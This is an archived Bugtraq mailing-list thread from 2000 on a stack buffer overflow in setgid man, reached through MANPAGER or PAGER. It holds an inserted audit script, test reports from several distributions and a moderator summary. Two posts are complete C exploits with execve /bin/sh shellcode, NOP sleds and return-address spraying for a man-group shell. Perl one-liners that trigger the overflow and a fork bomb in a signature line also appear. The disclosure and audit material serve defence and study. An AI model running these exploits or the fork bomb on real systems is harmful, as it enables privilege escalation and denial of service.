4843260 2000-02-28  11:10  /69 lines/ Postmaster
Recipient: Bugtraq (import) <9995>
Subject: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=ISO-8859-2
Message-ID:  <Pine.LNX.4.21.9402261301190.12075-100000@dione.ids.pl>
Date:         Sat, 26 Feb 1994 13:48:35 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by samantha.lysator.liu.se id KAA20266

With most Linux distributions, /usr/bin/man is shipped as setgid
man.  This setgid bit is required to build formatted manpages in
/var/catman for faster access. Unfortunately, man does almost
everything via system() calls, where parameters are user-dependent,
and almost always sprintf'ed beforehand into fixed size buffers. It's
kinda trivial to gain man privileges, using buffer overflows in
environment variables. For example, by specifying the MANPAGER variable
with approx 4k 'A' letters, you'll get SEGV:

$ MANPAGER=`perl -e '{print "A"x4000}'` man ls

[...]

1200  setuid(500)                       = 0
1200  setgid(15)                        = 0
1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  close(-1)                         = -1 EBADF (Bad file descriptor)
1200  write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200  --- SIGSEGV (Naruszenie ochrony pamięci) ---
1200  +++ killed by SIGSEGV +++

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

As you can see, SEGV occurs when we're at privileged level (after
setgid man) and is trivially exploitable (generic stack
overflow). What then? We have 'man' privileges and write access to
the /var/catman directory tree (less interesting, can be used to mess
around with man output), and, usually, to some /usr/man files (it
shouldn't be possible, but some compilers, like cpp, and programs
like fetchmail, for some reason have g+w manpages on many
systems). Days ago, Pawel Wilk described a possible vulnerability in
manpage processing - execution of arbitrary code when an evil manpage is
being browsed... A sample manpage is available at:

ftp://dione.ids.pl/people/siewca/security/man/mkroot.9

So, if you have write access to some manpages, and root uses man,
there's a chance to gain root privileges. If not, only lusers are
affected.

I have no information on other Unices, except for *BSD, where it
seems to be patched days ago, and SunOS, which seems to be
vulnerable, but isn't setuid/setgid (am I right? only one system
tested).

Solution: remove sgid bit from /usr/bin/man (it will be no longer
creating preformatted manpages in /var/catman), or rewrite major
portions of 'man' code.

_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(4843260) ------------------------------------------(Rewrapped)
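An audit helper for the three conditions the post above ties together (setuid/setgid bits on the man binary, a group- or world-writable preformatted-page cache, and writable manpage sources), added here as an example; it is not part of the thread or of man. The default paths are the ones the post names; the function names and the `--run` flag are my own.

```shell
#!/bin/sh
# man_sgid_audit.sh: added audit helper (not from the thread).  Checks the three
# conditions the post ties together: setuid/setgid bits on the man binary, a
# group/world-writable preformatted-page cache, and group/world-writable manpage
# sources.  Paths are parameters so the functions can be pointed at a scratch
# tree; the defaults are the ones named in the thread.  POSIX sh and find only.

# priv_bits FILE -> prints "suid", "sgid", "suid,sgid", "none" or "missing"
priv_bits() {
    f=$1
    if [ ! -e "$f" ]; then echo "missing"; return 1; fi
    bits=""
    if [ -n "$(find "$f" -prune -perm -4000 -print 2>/dev/null)" ]; then
        bits="suid"
    fi
    if [ -n "$(find "$f" -prune -perm -2000 -print 2>/dev/null)" ]; then
        bits="${bits:+$bits,}sgid"
    fi
    echo "${bits:-none}"
}

# writable_count DIR -> number of regular files under DIR that are group- or
# world-writable (the g+w cpp/fetchmail pages the post mentions would count here)
writable_count() {
    d=$1
    if [ ! -d "$d" ]; then echo 0; return 0; fi
    find "$d" -type f \( -perm -020 -o -perm -002 \) -print 2>/dev/null | wc -l | tr -d ' '
}

# audit_man [MANBIN] [CATTREE] [MANTREE] -> prints one line per finding and
# returns the number of findings (0 means none of the three conditions holds)
audit_man() {
    bin=${1:-/usr/bin/man}
    cache=${2:-/var/catman}
    src=${3:-/usr/man}
    findings=0

    b=$(priv_bits "$bin") || true
    if [ "$b" != "none" ] && [ "$b" != "missing" ]; then
        echo "FINDING: $bin is $b; MANPAGER/PAGER are parsed with raised privilege"
        findings=$((findings + 1))
    fi

    # Writable cache: what someone holding man's gid could tamper with
    n=$(writable_count "$cache")
    if [ "$n" -gt 0 ]; then
        echo "FINDING: $n group/world-writable file(s) under cache $cache"
        findings=$((findings + 1))
    fi

    # Writable sources: the precondition the post needs for the evil-manpage
    # route to root (root's own man run formats them)
    n=$(writable_count "$src")
    if [ "$n" -gt 0 ]; then
        echo "FINDING: $n group/world-writable manpage source(s) under $src"
        findings=$((findings + 1))
    fi

    if [ "$findings" -eq 0 ]; then
        echo "OK: $bin carries no setuid/setgid bit; no writable files under $cache or $src"
    else
        echo "Remediation named in the thread: chmod g-s $bin (gives up the catman cache); chmod go-w on the listed files"
    fi
    return "$findings"
}

# Audit the live system only when invoked as: sh man_sgid_audit.sh --run [bin] [cache] [src]
if [ "${1:-}" = "--run" ]; then
    shift
    audit_man "$@"
fi
```

The exit status of `audit_man` is the number of findings, so it can drive a cron job or a configuration check without parsing the text.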

4845380 2000-02-28  19:17  /86 lines/ Postmaster
Recipient: Bugtraq (import) <10000>
Subject: man exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000228090917.A7988@freebsd.lublin.pl>
Date:         Mon, 28 Feb 2000 09:09:17 +0100
Reply-To: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

/*
 * (c) 2000 babcia padlina / b0f
 * (lcamtuf's idea)
 *
 * redhat 6.1 /usr/bin/man exploit
*/

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP		0x90
#define OFS		1800
#define BUFSIZE		4002
#define ADDRS		1000

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
	char *execshell =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

	char *buf, *p;
	int noplen, i, ofs;
	long ret, *ap;

	if(!(buf = (char *)malloc(BUFSIZE+ADDRS+1)))
	{
		perror("malloc()");
		return -1;
	}

	if (argc > 1)
		ofs = atoi(argv[1]);
	else
		ofs = OFS;

	noplen = BUFSIZE - strlen(execshell);
	ret = getesp() + ofs;

	memset(buf, NOP, noplen);
	buf[noplen+1] = '\0';
	strcat(buf, execshell);

	p = buf + noplen + strlen(execshell);
        ap = (unsigned long *)p;

        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;

        p = (char *)ap;
        *p = '\0';

	fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));

	setenv("MANPAGER", buf, 1);
	execl("/usr/bin/man", "man", "ls", 0);

	return 0;
}

-- * Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL:
PMF9-RIPE * * Inet: venglin@freebsd.lublin.pl ** PGP:
D48684904685DF43  EA93AFA13BE170BF *
(4845380) ------------------------------------------(Rewrapped)

4845610 2000-02-28  20:46  /48 lines/ Postmaster
Recipient: Bugtraq (import) <10007>
Subject: Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.3.96.1000227232847.11234b-100000@down.dbd.com>
Date:         Sun, 27 Feb 2000 23:48:09 -0500
Reply-To: Mark Whitis <whitis@DBD.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Mark Whitis <whitis@DBD.COM>
X-To:         Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.21.9402261301190.12075-100000@dione.ids.pl>

On Sat, 26 Feb 1994, Michal Zalewski wrote:

> With most Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always
> sprintf'ed beforehand into fixed size buffers. It's kinda trivial to gain man
> privileges, using buffer overflows in environment variables. For example,
> by specifying the MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:

This might be a side effect of the fix for another security hole.
IIRC, /var/catman/ was world writable allowing for all kinds of
symlink games which would allow ordinary users to do some things as
root (like clobbering files) by laying a trap in /var/catman/ and
waiting for root to run man.

Exploiting this buffer overflow bug to gain man privileges would then
allow you to exploit the previous bugs as well if root runs "man"
(or possibly the privileges of any user who runs man).

If you need to run man as root, consider:
   su nobody -c "man ls"             # assumes shell is /bin/bash
Or just switch to another console or window.

The man program was never designed to be secure but having a shared
manpage cache requires man to be secure.  If you disable man page
caching, you should be able to run man without setgid.

---------------------------------------------------------------------------
---  Mark Whitis <whitis@dbd.com>     WWW:  http://www.dbd.com/~whitis/ ---
---------------------------------------------------------------------------
(4845610) ------------------------------------------(Rewrapped)
4845647 2000-02-28  21:00  /36 lines/ Postmaster
Recipient: Bugtraq (import) <10008>
Subject: Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.21.0002280901120.2162-100000@dione.ids.pl>
Date:         Mon, 28 Feb 2000 09:01:56 +0100
Reply-To: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-To:         H D Moore <hdm@secureaustin.com>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <38BA0428.E626D348@secureaustin.com>

On Sun, 27 Feb 2000, H D Moore wrote:

> Hi,
>
> I could not reproduce this on a SuSE 6.2 system running:
>
> man, version 2.3.10, db 2.3.1, July 12th, 1995
> (G.Wilford@ee.surrey.ac.uk)
>
> My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
> in every environment variable it uses without it flinching.

Try setting PAGER instead of MANPAGER - older man versions used it.

_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(4845647) ------------------------------------------

4845845 2000-02-28  21:54  /68 lines/ Postmaster
Recipient: Bugtraq (import) <10010>
Subject: Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset="ISO-8859-2"
Message-ID:  <B354AE82055CD311854A00902779138F1005@sc-data.springfieldclinic.com>
Date:         Mon, 28 Feb 2000 09:48:55 -0600
Reply-To: "Licquia, Jeff" <JLicquia@SPRINGFIELDCLINIC.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "Licquia, Jeff" <JLicquia@SPRINGFIELDCLINIC.COM>
X-To:         "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id VAA21153

Tested on Debian potato.  No SIGSEGV.

Package status for man on my box:

Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name           Version        Description
+++-==============-==============-============================================
ii  man-db         2.3.10-69s     Display the on-line manual.

-----Original Message-----
From: Michal Zalewski [mailto:lcamtuf@DIONE.IDS.PL]
Sent: Saturday, February 26, 1994 6:49 AM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: man bugs might lead to root compromise (RH 6.1 and other boxes)


With most Linux distributions, /usr/bin/man is shipped as setgid
man.  This setgid bit is required to build formatted manpages in
/var/catman for faster access. Unfortunately, man does almost
everything via system() calls, where parameters are user-dependent,
and almost always sprintf'ed beforehand into fixed size buffers. It's
kinda trivial to gain man privileges, using buffer overflows in
environment variables. For example, by specifying the MANPAGER variable
with approx 4k 'A' letters, you'll get SEGV:

$ MANPAGER=`perl -e '{print "A"x4000}'` man ls

[...]

1200  setuid(500)                       = 0
1200  setgid(15)                        = 0
1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  close(-1)                         = -1 EBADF (Bad file descriptor)
1200  write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
1200  --- SIGSEGV (Naruszenie ochrony pamięci) ---
1200  +++ killed by SIGSEGV +++

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

[...]
(4845845) ------------------------------------------(Rewrapped)

4845915 2000-02-28  22:17  /44 lines/ Postmaster
Recipient: Bugtraq (import) <10012>
Subject: Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID:  <38BA61F2.60052785@secureaustin.com>
Date:         Mon, 28 Feb 2000 05:54:26 -0600
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To:         Michal Zalewski <lcamtuf@dione.ids.pl>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

I tried PAGER as well as every other environment variable I could tell
it read, no luck.  The PAGER just gives me "AAAAAAAAA" ... "AA:
Command not found."

-HD

Michal Zalewski wrote:
>
> On Sun, 27 Feb 2000, H D Moore wrote:
>
> > Hi,
> >
> > I could not reproduce this on a SuSE 6.2 system running:
> >
> > man, version 2.3.10, db 2.3.1, July 12th, 1995
> > (G.Wilford@ee.surrey.ac.uk)
> >
> > My copy is setgid man and I also subjected it to 4,8, and 20 kb buffers
> > in every environment variable it uses without it flinching.
>
> Try setting PAGER instead of MANPAGER - older man version used it.
>
> _______________________________________________________
> Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
> [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
> [+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
> =-----=> God is real, unless declared integer. <=-----=
(4845915) ------------------------------------------(Rewrapped)

4846058 2000-02-28  22:51  /81 lines/ Postmaster
Recipient: Bugtraq (import) <10013>
Subject: linux SGID-man exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.10.10002280617450.25519-100000@sdf.lonestar.org>
Date:         Mon, 28 Feb 2000 06:23:06 -0600
Reply-To: mario paskual <buterfre@SDF.LONESTAR.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: mario paskual <buterfre@SDF.LONESTAR.ORG>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

/*
   ***************************************************
   ***               agroMANauer.c                 ***
   ***          linux SGID-man exploit             ***
   ***       by buterfree@lettera.net 2000         ***
   ***           tested on RedHat 5.1              ***
   ***         It gives an egid-man shell          ***
   ***                                             ***
   *** Dedicated to Juan, Jor and the chamizu crew ***
   ***   (Hey man, the war has only just begun)    ***
   ***************************************************
*/

#include <stdio.h>
#define BUF_SIZE 5000
#define POS_RET  3500
#define RETADDR  0xbfffefef

// shellcode
char shellcode[] = // 48 characters
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh";

void main (int argc, char *argv[]) {
  int i;
  FILE *f;
  char buf[BUF_SIZE];
  long retaddr, offset;
	
  printf ("\n");
  printf ("****************************************\n");
  printf ("* agroMANauer (linux SGID-man exploit) *\n");
  printf ("*     by buterfree@lettera.net 2000    * \n");
  printf ("**************************************** \n\n");
  printf ("Try offsets -3000,0,3000,...\n");
  printf ("Use : %s [offset] \n", argv[0]);

  offset = 0;
  if (argc>1) {
    offset = atol (argv[1]);
  }

  retaddr = RETADDR + offset;
  printf ("Return Address = 0x%x \n",retaddr);

  // Fill buffer with NOP's
  memset (buf, 0x90, BUF_SIZE);
  buf[BUF_SIZE]=0;
	
  // Copy Return Address
  for (i=POS_RET; i<=BUF_SIZE-10; i+=4) {
    *(long*)(buf+i) = (long) retaddr;
  }

  // Copy shellCode
  for (i=0; i<strlen(shellcode); i++) {
    buf[i+POS_RET-strlen(shellcode)-20] = shellcode[i];
  }

  // Export MANPAGER
  setenv ("MANPAGER", buf, 1);

  // Run program
  execl ("/usr/bin/man","man","ls",NULL);

}
(4846058) ------------------------------------------
4846522 2000-02-29  00:46  /56 lines/ Postmaster
Recipient: Bugtraq (import) <10014>
Subject: Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Message-ID:  <38BA0428.E626D348@secureaustin.com>
Date:         Sun, 27 Feb 2000 23:14:16 -0600
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To:         Michal Zalewski <lcamtuf@DIONE.IDS.PL>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id AAA27680

Hi,

I could not reproduce this on a SuSE 6.2 system running:

man, version 2.3.10, db 2.3.1, July 12th, 1995
(G.Wilford@ee.surrey.ac.uk)

My copy is setgid man and I also subjected it to 4,8, and 20 kb
buffers in every environment variable it uses without it flinching.



Michal Zalewski wrote:
> 
> With most Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always
> sprintf'ed beforehand into fixed size buffers. It's kinda trivial to gain man
> privileges, using buffer overflows in environment variables. For example,
> by specifying the MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:
> 
> $ MANPAGER=`perl -e '{print "A"x4000}'` man ls
> 
> [...]
> 
> 1200  setuid(500)                       = 0
> 1200  setgid(15)                        = 0
> 1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200  open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)1200  close(-1)                         = -1 EBADF (Bad file descriptor)
> 1200  write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
> 1200  --- SIGSEGV (Naruszenie ochrony pamięci) ---
> 1200  +++ killed by SIGSEGV +++
> 
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
(4846522) ------------------------------------------(Rewrapped)

4853647 2000-03-01  21:11  /178 lines/ Postmaster
Recipient: Bugtraq (import) <10049>
Subject: Re: man bugs might lead to root compromise (RH 6.1 and other boxes)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000301115937.R4498@securityfocus.com>
Date:         Wed, 1 Mar 2000 11:59:37 -0800
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Elias Levy <aleph1@SECURITYFOCUS.COM>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Summary of comments on this thread:

"Dehner, Ben" <Btd@valmont.com>:

HPUX 10.20 also does not have suid/sgid /usr/bin/man, so I would
guess is not exploitable.

Thomas Molina <tmolina@home.com>:

babcia padlina exploit did not work under RedHat 6.1

Przemyslaw Frasunek <venglin@own3d.freebsd.lublin.pl>:

so try other offsets. -1000 should work on most redhat 6.1/6.0/5.2
boxes.

Stefan Schneider <stefan.schneider@comsat.com.ve>:

No problems here...

Tested on SuSE 6.3, no SIGSEGV either.... The box is a regular SuSE
6.3 install (No patches, fresh install from the CD's) and the package
status is man-db ver 2.3.10-69d69i.

krasel@wpxx02.toxi.uni-wuerzburg.de (Cornelius Krasel):

SuSE man (at least on SuSE 6.3 which is the same version) uses PAGER
instead of MANPAGER and blissfully crashes when subjected to 4000 'A'
letters in this variable.

I didn't manage to get the redhat exploit to work properly, but I got
several times "sh: =FC=FF=BF: command not found" which indicates to
me that a more skillful programmer than me would be able to get it to
work.

Phil Stracchino <alaric@babcom.com>:

Slackware 7.0 does not appear to be vulnerable.  /usr/bin/man is not
setgid in slackware, so although it does indeed SEGV at the expected
location, no privileges are gained.

"Licquia, Jeff" <JLicquia@SpringfieldClinic.com>:

On my aforementioned Debian system, this fails with:

sh: AAAA...AAAA: command not found
man: command exited with status 32512: /bin/gzip -dc
'/var/cache/man/cat1/ls.1.gz' | { export MAN_PN LESS; MAN_PN='ls(1)';
LESS="$LESS\$-Pm\:\$ix8mPm Manual page $MAN_PN ?ltline %lt?L/%L.:byte
%bB?s/%s..?e (END):?pB %pB\\%.."; AAAA....AAAA; }

(AAA's truncated for readability)

Greg Olszewski <noop@nwonknu.org>:

This does not create a sigsegv on Debian GNU/Linux slink, potato, or
woody.  With man -V of: slink: man, version 2.3.10, db 2.3.1, July
12th, 1995 (G.Wilford@ee.surrey.ac.uk) debian version 2.3.10-69FIX.1,
(Jun  9 1999),  Fabrizio Polacco <fpolacco@debian.org>

potato & woody: man, version 2.3.12, Wed Feb 23 00:00:00 EET 2000
(fpolacco@debian.org)

It was tried setting both MANPAGER and PAGER. In each case, 4000 and
20000 were tried, and sh:<a lot of A's> command not found was echoed
to stderr.

The lack of a sgid bit on /usr/bin/man is the default configuration
for both potato and woody.

Scott Lamb <slamb@oh.yeah.org>:

On my RedHat 6.1 system, this does NOT appear to be exploitable. The
reason is: the execution of arbitrary commands is done while
processing the troff macros: while generating the catman pages from
the man pages. Merely viewing the preformatted pages does not allow
commands to be executed.

So it is not exploitable without access to the man (*.[1-9])
pages. On RedHat 6.1, these are owned by root. Exploiting the buffer
overflow in man gives you a chance to be annoying and send nasty
messages to people when they run man, but not gain root priveleges.

Bob Billson <bob@goleader.com>:

Same here on two different Linux boxen, running Debian (Slink and
Potato).

H D Moore <hdm@secureaustin.com>:

I tested this on a stock RedHat 6.1 box and it wouldn't segfault
unless at least 4534 characters were in the buffer.  With some
twiddling on the command line I got it to jump to arbitrary addresses
with:

$ MANPATH=`perl -e 'print "A" x 4534 . "BBBB"'`

^-- this makes it jump to 0x42424242

Anyways, anyone feel like writing an exploit?

Julian Squires <tek@wiw.org>:

I could equally not reproduce this on several Debian machines,
running:
man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilford@ee.surrey.ac.uk)
        debian version 2.3.10-69s, (Oct 28 1999),  Fabrizio Polacco <fpolacco@debian.org>

as well as:
man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilford@ee.surrey.ac.uk)
        debian version 2.3.10-71, (Feb 11 2000),  Fabrizio Polacco <fpolacco@debian.org>

/usr/bin/man is setuid man under debian, and I attempted with both
PAGER and MANPAGER variables, with strings up to 65536 bytes in
length.

What version of man is vulnerable to this?

Marcin Owsiany <porridge@pandora.info.bielsko.pl>:

Tested on Debian potato

ii  man-db         2.3.12         Display the on-line manual.

and slink (2.1)

ii  man-db          2.3.10-69FIX.1 Display the on-line manual.

both PAGER and MANPAGER set to a length from 400 to 40000 Bytes.
No SIGSEGV

Dylan Griffiths <Dylan_G@bigfoot.com>:

Slackware Linux 7.0 is not setgid man, and the /var/man/cat
directories are owned root.root, but have the same sticky bit as the
/tmp directory.  So Slackware is likely secure from any man exploits.

Kris Kennaway <kris@hub.freebsd.org>:

FreeBSD uses the GNU man code, but it seems we fixed this (along with
a bunch of other overflows) back in '96..

Luca Berra <bluca@comedia.it>:

This is man_db, a different program from the standard Linux man.
Past versions had bugs of their own; check the bugtraq archives.

Thomas Bader <thomasb@trash.net>:

I could not reproduce this either. I'm using Debian GNU/Linux 2.1.
"man --version" says:

| man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilford@ee.surrey.ac.uk)
|       debian version 2.3.10-68, (Oct  6 1998),  Fabrizio Polacco <fpolacco@debian.org>

And "ls -l /usr/bin/man" says:

|-rwsr-xr-x   1 man      root       119864 Oct  6  1998 /usr/bin/man

I tried the environments PAGER and MANPAGER, but they both didn't work.



--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
(4853647) ------------------------------------------(Rewrapped)